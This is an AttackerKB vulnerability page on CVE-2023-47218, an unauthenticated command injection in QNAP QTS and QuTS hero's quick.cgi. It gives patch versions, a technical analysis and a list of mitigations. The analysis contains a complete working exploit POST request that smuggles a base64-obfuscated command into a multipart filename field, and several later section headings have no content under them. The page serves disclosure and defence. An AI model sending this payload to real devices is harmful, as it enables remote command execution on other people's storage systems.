Very High
CVE-2023-47218
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
Very High
(1 user assessed)Low
(1 user assessed)Unknown
Unknown
Unknown
CVE-2023-47218
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network.
We have already fixed the vulnerability in the following versions:
QTS 5.1.5.2645 build 20240116 and later
QuTS hero h5.1.5.2647 build 20240118 and later
QuTScloud c5.1.5.2651 and later
Add Assessment
Ratings
-
Attacker ValueVery High
-
ExploitabilityLow
Technical Analysis
An unauthenticated command injection vulnerability exists in the quick.cgi
component of the web administration server for QNAP QTS and QuTS Hero operating systems, used by numerous QNAP NAS devices. The quick.cgi
component exposes functionality to remotely provision a QNAP device. An attacker with network access to an uninitialized QNAP NAS device may perform unauthenticated command injection.
The vulnerability affects QTS 5.1.x, prior to the vendor patch QTS 5.1.5.2645 build 20240116
, and QuTS hero h5.1.x, prior to the vendor patch QuTS hero h5.1.5.2647 build 20240118
.
A HTTP(S) POST request targeting the uploaf_firmware_image
functionality of quick.cgi
can trigger a command injection vulnerability if the user agent contains both the words Mozilla
and Macintosh
. This is because a file name passed as part of the POST request multipart form-data will be URL decoded if the user agent matches these special words. This allows for a double quote character (URL encoded as %22
) to be supplied as part of the file name, allowing a command string to be escaped and command injection to occur.
An example request that exploits this vulnerability is as follows:
POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image HTTP/1.1 Host: 192.168.86.42:8080 User-Agent: Mozilla Macintosh Accept: */* Content-Length: 164 Content-Type: multipart/form-data;boundary="avssqwfz" --avssqwfz Content-Disposition: form-data; xxpcscma="field2"; zczqildp="%22$($(echo -n aWQ=|base64 -d)>a)%22" Content-Type: text/plain skfqduny --avssqwfz–
A detailed analysis and PoC can be found in our Rapid7 disclosure.
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportCVSS V3 Severity and Metrics
General Information
Vendors
- QNAP Systems Inc.
Products
- QTS,
- QuTS hero,
- QuTScloud
References
Additional Info
Technical Analysis
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
let’s delve deeper into the details of the QNAP QTS and QuTS Hero Unauthenticated Remote Code Execution (RCE) vulnerability:
Vulnerability Overview
The vulnerability, identified by CVE-2023-47218, exposes an unauthenticated command injection risk within the QNAP operating systems QTS and QuTS Hero. QTS is integral to the firmware of numerous entry and mid-level QNAP Network Attached Storage (NAS) devices, while QuTS Hero plays a core role in high-end and enterprise-level NAS devices.
Vulnerable Component:
The flaw resides in the
quick.cgi
component, which is accessible through the device’s web-based administration feature. This component, present in uninitialized QNAP NAS devices, is designed for manual or cloud-based provisioning during the NAS device’s setup. Once the device is initialized successfully,quick.cgi
is disabled.An attacker with network access to an uninitialized QNAP NAS device can leverage this vulnerability to perform unauthenticated command injection. This allows the attacker to execute arbitrary commands on the target device.
Exploit Details
Check Function:
check
function sends a GET request to/cgi-bin/quick/quick.cgi
.<Result>
failure</Result>
’ confirms the vulnerability.Exploit Function:
Payload Limitation:
Execute Command Function:
Upload File Function:
Mitigations and Recommendations
Patch and Update:
Authentication Mechanisms:
Payload Length Limitation:
Payload Execution:
File Upload Security:
Network Access:
Post-Exploitation Cleanup:
This detailed analysis provides a comprehensive understanding of the vulnerability, its exploitation methods, and suggested mitigations to secure QNAP NAS devices from potential threats.
To prevent the QNAP QTS and QuTS Hero Unauthenticated Remote Code Execution attack from recurring, consider implementing the following security measures:
Apply Vendor Patch:
Network Segmentation:
Strong Authentication:
Regular Security Audits:
Intrusion Detection Systems (IDS):
File Upload Restrictions:
Input Validation:
Least Privilege Principle:
Security Awareness Training:
Monitoring and Logging:
Incident Response Plan:
Penetration Testing:
Vendor Communication:
By implementing these preventive measures, organizations can significantly reduce the risk of similar unauthenticated remote code execution attacks and enhance the overall security posture of their QNAP NAS devices.